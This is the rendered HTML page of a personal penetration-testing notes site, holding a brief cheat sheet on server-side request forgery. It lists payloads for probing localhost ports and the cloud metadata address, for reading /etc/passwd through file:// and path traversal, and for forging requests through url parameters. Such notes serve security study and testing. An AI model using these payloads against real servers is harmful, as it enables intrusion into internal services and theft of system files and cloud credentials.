stefan
/
husk
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
husk/build/exploit/web/ssrf/ssrf.html

334 lines
46 KiB
HTML
Raw Normal View History

init
2022-09-02 09:05:59 +02:00
<!doctype html>
<html lang="en">
<center>
<head>
<script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
<!-- mathjax -->
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="/static/js/auto-complete.js"></script>
<script type="text/javascript" src="/static/js/lunr.min.js"></script>
<script type="text/javascript" src="/static/js/search.js"></script>
<link rel="stylesheet" href="/static/stylesheet.css">
<link rel="stylesheet" href="/static/auto-complete.css">
<br>
<title>In the Open</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<!-- topmenu -->
<div class="menu">
<a href="/" style="text-decoration:none">In the Open</a>
</div>
<div class="search-container">
<label for="search-by"><i class="fas fa-search"></i></label>
<input data-search-input="" id="search-by" type="search" placeholder="Search..." autocomplete="off">
<!--button type="submit"><i class="search"></i>&#128269;</button>-->
<span data-search-clear=""><i class="fas fa-times"></i></span>
</div>
</div>
<div class="menu">
</div>
<!--br><br-->
</center>
<p></p>
<div class="columns">
<!-- Sidebar -->
<div class="column column-1">
<ul><details id=crypto ontoggle="linkClick(this); return false;" ><summary>Crypto</summary><ul><details id=openssl ontoggle="linkClick(this); return false;" ><summary>Openssl</summary><ul><li><a href="/crypto/openssl/openssl.html">openssl</a></li><li><a href="/crypto/openssl/openssl_engine.html">openssl_engine</a></li></ul></details><li><a href="/crypto/rsa.html">rsa</a></li></ul></details><details id=enumeration ontoggle="linkClick(this); return false;" ><summary>Enumeration</summary><ul><details id=containers ontoggle="linkClick(this); return false;" ><summary>Containers</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/enumeration/docs/aws.html">aws</a></li><li><a href="/enumeration/docs/cewl.html">cewl</a></li><li><a href="/enumeration/docs/dns.html">dns</a></li><li><a href="/enumeration/docs/docker_enumeration.html">docker_enumeration</a></li><li><a href="/enumeration/docs/ffuf.html">ffuf</a></li><li><a href="/enumeration/docs/gobuster.html">gobuster</a></li><li><a href="/enumeration/docs/kerberoast.html">kerberoast</a></li><li><a href="/enumeration/docs/kubectl.html">kubectl</a></li><li><a href="/enumeration/docs/ldap.html">ldap</a></li><li><a href="/enumeration/docs/linux_basics.html">linux_basics</a></li><li><a href="/enumeration/docs/microk8s.html">microk8s</a></li><li><a href="/enumeration/docs/nfs.html">nfs</a></li><li><a href="/enumeration/docs/nikto.html">nikto</a></li><li><a href="/enumeration/docs/nmap.html">nmap</a></li><li><a href="/enumeration/docs/port_knocking.html">port_knocking</a></li><li><a href="/enumeration/docs/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/docs/rsync.html">rsync</a></li><li><a href="/enumeration/docs/rustscan.html">rustscan</a></li><li><a href="/enumeration/docs/shodan.html">shodan</a></li><details id=snmp ontoggle="linkClick(this); return false;" ><summary>Snmp</summary><ul><li><a href="/enumeration/docs/snmp/onesixtyone.html">onesixtyone</a></li><li><a href="/enumeration/docs/snmp/snmpcheck.html">snmpcheck</a></li></ul></details><li><a href="/enumeration/docs/websites.html">websites</a></li><li><a href="/enumeration/docs/wfuzz.html">wfuzz</a></li><li><a href="/enumeration/docs/wpscan.html">wpscan</a></li></ul></details><details id=network_scanners ontoggle="linkClick(this); return false;" ><summary>Network_scanners</summary><ul></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/enumeration/windows/bloodhound.html">bloodhound</a></li><li><a href="/enumeration/windows/event_log.html">event_log</a></li><li><a href="/enumeration/windows/manual_enum.html">manual_enum</a></li><li><a href="/enumeration/windows/powershell.html">powershell</a></li><li><a href="/enumeration/windows/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/windows/sysinternals.html">sysinternals</a></li><li><a href="/enumeration/windows/sysmon.html">sysmon</a></li><li><a href="/enumeration/windows/vss.html">vss</a></li></ul></details></ul></details><details id=exfiltration ontoggle="linkClick(this); return false;" ><summary>Exfiltration</summary><ul><details id=dns ontoggle="linkClick(this); return false;" ><summary>Dns</summary><ul><li><a href="/exfiltration/dns/dns.html">dns</a></li></ul></details><details id=linux ontoggle="linkClick(this); return false;" ><summary>Linux</summary><ul><li><a href="/exfiltration/linux/nc.html">nc</a></li><li><a href="/exfiltration/linux/wget.html">wget</a></li></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/exfiltration/windows/evil-winrm.html">evil-winrm</a></li><li><a href="/exfiltration/windows/loot.html">loot</a></li><li><a href="/exfiltration/windows/smb_connection.html">smb_connection</a></li></ul></details></ul></details><details id=exploit ontoggle="linkClick(this); return false;" ><summary>Exploit</summary><ul><details id=CPUs ontoggle="linkClick(this); return false;" ><summary>CPUs</summary><ul><li><a href="/exploit/CPUs
</ul>
</div>
<div class="column column-2">
<span class="body">
<style>pre { line-height: 125%; }
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
.codehilite .hll { background-color: #2C3B41 }
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
.codehilite .err { color: #FF5370 } /* Error */
.codehilite .esc { color: #89DDFF } /* Escape */
.codehilite .g { color: #EEFFFF } /* Generic */
.codehilite .k { color: #BB80B3 } /* Keyword */
.codehilite .l { color: #C3E88D } /* Literal */
.codehilite .n { color: #EEFFFF } /* Name */
.codehilite .o { color: #89DDFF } /* Operator */
.codehilite .p { color: #89DDFF } /* Punctuation */
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
.codehilite .gr { color: #FF5370 } /* Generic.Error */
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
.codehilite .go { color: #546E7A } /* Generic.Output */
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
.codehilite .ld { color: #C3E88D } /* Literal.Date */
.codehilite .m { color: #F78C6C } /* Literal.Number */
.codehilite .s { color: #C3E88D } /* Literal.String */
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
.codehilite .nc { color: #FFCB6B } /* Name.Class */
.codehilite .no { color: #EEFFFF } /* Name.Constant */
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
.codehilite .ni { color: #89DDFF } /* Name.Entity */
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
.codehilite .nf { color: #82AAFF } /* Name.Function */
.codehilite .nl { color: #82AAFF } /* Name.Label */
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
.codehilite .nx { color: #EEFFFF } /* Name.Other */
.codehilite .py { color: #FFCB6B } /* Name.Property */
.codehilite .nt { color: #FF5370 } /* Name.Tag */
.codehilite .nv { color: #89DDFF } /* Name.Variable */
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */</style>
<div class="column column-3">
<ul>
<li><a href="#server-side-request-forgery-ssrf">Server Side Request Forgery (SSRF)</a><ul>
<li><a href="#usage">Usage</a><ul>
<li><a href="#sanity-test-service">Sanity Test Service</a></li>
<li><a href="#reading-files">Reading files</a></li>
<li><a href="#request-forgery-through-get-parameters">Request Forgery through GET parameters</a></li>
<li><a href="#html-form">HTML Form</a></li>
</ul>
</li>
<li><a href="#tricks">Tricks</a></li>
<li><a href="#tools">Tools</a></li>
</ul>
</li>
</ul>
</div>
<h1 id="server-side-request-forgery-ssrf">Server Side Request Forgery (SSRF)</h1>
<p>is a vulnerability in web applications whereby an attacker can make further HTTP requests through the server. An attacker can make use of this vulnerability to communicate with any internal services on the server's network which are generally protected by firewalls. The attack can either be blind or data is returned to the attacker dire tly.</p>
<h2 id="usage">Usage</h2>
<h3 id="sanity-test-service">Sanity Test Service</h3>
<p>Test if input is sanitized by exploiting function. Here it is IP:PORT finding service. Test for localhost ports.</p>
<div class="codehilite"><pre><span></span><code>http://127.0.0.1:3306
http://localhost:5432
http://0.0.0.0:53
</code></pre></div>
<ul>
<li>IPv6</li>
</ul>
<div class="codehilite"><pre><span></span><code>http://[::]:3306
http://:::3006
</code></pre></div>
<ul>
<li>Cloud info in Link Local IP range <code>169.254.0.0/16</code></li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="mf">169.254.169.254</span><span class="w"> </span><span class="o">--&gt;</span><span class="w"> </span><span class="n">AWS</span><span class="w"> </span><span class="n">info</span><span class="w"></span>
<span class="mf">169.254.169.253</span><span class="w"> </span><span class="o">--&gt;</span><span class="w"> </span><span class="n">DNS</span><span class="w"> </span><span class="n">AWS</span><span class="w"> </span><span class="n">VPC</span><span class="w"></span>
<span class="mf">169.254.169.123</span><span class="w"> </span><span class="o">--&gt;</span><span class="w"> </span><span class="n">Stratum</span><span class="w"> </span><span class="mf">3</span><span class="w"> </span><span class="n">NTP</span><span class="w"></span>
<span class="mf">127.0.0.1</span><span class="p">:</span><span class="mf">53</span><span class="w"> </span><span class="o">--&gt;</span><span class="w"> </span><span class="kr">sys</span><span class="n">temd</span><span class="w"> </span><span class="n">DNS</span><span class="w"></span>
</code></pre></div>
<ul>
<li><a href="https://gist.github.com/mzfr/fd9959bea8e7965d851871d09374bb72">Changing input format into hex or encoded</a></li>
</ul>
<h3 id="reading-files">Reading files</h3>
<div class="codehilite"><pre><span></span><code>file:///etc/passwd
</code></pre></div>
<h3 id="request-forgery-through-get-parameters">Request Forgery through GET parameters</h3>
<ul>
<li>Request app server through parameter </li>
</ul>
<div class="codehilite"><pre><span></span><code>http://&lt;ssrf-Server&gt;/?url<span class="o">=</span>http://&lt;AppServer&gt;/secret/url
</code></pre></div>
<ul>
<li>Request remote resources, or path traversal on remote resource</li>
</ul>
<div class="codehilite"><pre><span></span><code>http://&lt;ssrf-Server&gt;/?url<span class="o">=</span>/item?id<span class="o">=</span><span class="m">42</span>
http://&lt;ssrf-Server&gt;/?url<span class="o">=</span>../../etc/passwd
</code></pre></div>
<ul>
<li>Request subdomain URL and cut following unnecessary parameters through <code>&amp;x=&amp;id=42</code>. Parameter <code>x</code> does not exist. So, it will be ignored</li>
</ul>
<div class="codehilite"><pre><span></span><code>http://&lt;ssrf-Server&gt;/?url<span class="o">=</span>db.test.com/shop/item?secret<span class="o">=</span>key<span class="p">&amp;</span><span class="nv">x</span><span class="o">=</span><span class="p">&amp;</span><span class="nv">id</span><span class="o">=</span><span class="m">42</span>
</code></pre></div>
<h3 id="html-form">HTML Form</h3>
<p>User input through POST form on websites may open files (other MIME types) from server resources. Updating the path reference may yield unintended file content.</p>
<div class="codehilite"><pre><span></span><code><span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">&quot;radio&quot;</span> <span class="na">name</span><span class="o">=</span><span class="s">&quot;avatar&quot;</span> <span class="na">value</span><span class="o">=</span><span class="s">&quot;assets/avatars/6.png&quot;</span><span class="p">&gt;</span>
</code></pre></div>
<p>This may be used for path traversal</p>
<div class="codehilite"><pre><span></span><code><span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">&quot;radio&quot;</span> <span class="na">name</span><span class="o">=</span><span class="s">&quot;avatar&quot;</span> <span class="na">value</span><span class="o">=</span><span class="s">&quot;x/../private&quot;</span><span class="p">&gt;</span>
</code></pre></div>
<p>Check return value of the form for result.</p>
<h2 id="tricks">Tricks</h2>
<ul>
<li><code>localtest.me</code> resolves to <code>127.0.0.1</code>, may be used to extend a domain inside a parameter to redirect to localhost.</li>
</ul>
<h2 id="tools">Tools</h2>
<ul>
<li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#file">Payload All The Things</a></li>
<li>https://requestbin.com</li>
</ul>
</span>
</div>
</div>
<div id="footer">
<p></p>
<center>
&copy; Stefan Friese
</center>
</div>
<script>
function linkClick(obj) {
if (obj.open) {
console.log('open');
if (sessionStorage.getItem(obj.id) && !(sessionStorage.getItem(obj.id) === "open")) {
sessionStorage.removeItem(obj.id);
}
sessionStorage.setItem(obj.id,"open");
console.log(obj.id);
} else {
console.log('closed');
sessionStorage.removeItem(obj.id);
}
// if (obj.open) {
// console.log('open');
// if (sessionStorage.getItem("opened") && !(sessionStorage.getItem("opened") === obj.id)) {
// sessionStorage.removeItem("opened");
// }
// sessionStorage.setItem("opened", obj.id);
// console.log(obj);
// } else {
// console.log('closed');
// sessionStorage.removeItem("opened");
//
// }
}
//if ( sessionStorage.getItem("opened")) {
// var item = sessionStorage.getItem("opened")
// document.getElementById(item)['open'] = 'open';
//}
let _keys = Object.keys(sessionStorage);
if (_keys) {
for ( let i = 0; i < _keys.length; i++ ) {
document.getElementById(_keys[i])['open'] = 'open';
}
}
// const detailsElement = document.querySelector('.details-sidebar');
// detailsElement.addEventListener('toggle', event => {
// if (event.target.open) {
// console.log('open');
// if (sessionStorage.getItem("opened") && !(sessionStorage.getItem("opened") === detailsElement.id)) {
// sessionStorage.removeItem("opened");
// }
// sessionStorage.setItem("opened", detailsElement.id);
// console.log(detailsElement);
//
// } else {
// console.log('closed');
// sessionStorage.removeItem("opened");
//
// }
// });
//
// async function fetchIndexJSON() {
// const response = await fetch('/index.json');
// const index = await response.json();
// return index;
// }
// // Extract the `q` query parameter
//var queryStringRegex = /[\?&]q=([^&]+)/g;
//var matches = queryStringRegex.exec(window.location.search);
//if(matches && matches[1]) {
// var value = decodeURIComponent(matches[1].replace(/\+/g, '%20'));
//
//
// // fetchIndexJSON()
// // .then(index => { console.log(index['index']);});
// // Load the posts to search
// fetch('/index').then(function(posts) {
// // Remember to include Fuse.js before this script.
//
// var fuse = new Fuse(posts, {
// keys: ['title', 'tags', 'content'] // What we're searching
// });
//
// // Run the search
// var results = fuse.search(value);
// //console.log(results);
//
// // Generate markup for the posts, implement SearchResults however you want.
// // var $results = SearchResults(results);
//
// // Add the element to the empty <div> from before.
//// $('#searchResults').append($results);
// });
//}
</script>
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js"></script>
<script src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
</script>
<script type="text/x-mathjax-config">
MathJax.Hub.Config({
config: ["MMLorHTML.js"],
jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
extensions: ["MathMenu.js", "MathZoom.js"]
});
</script>
</body>
</html>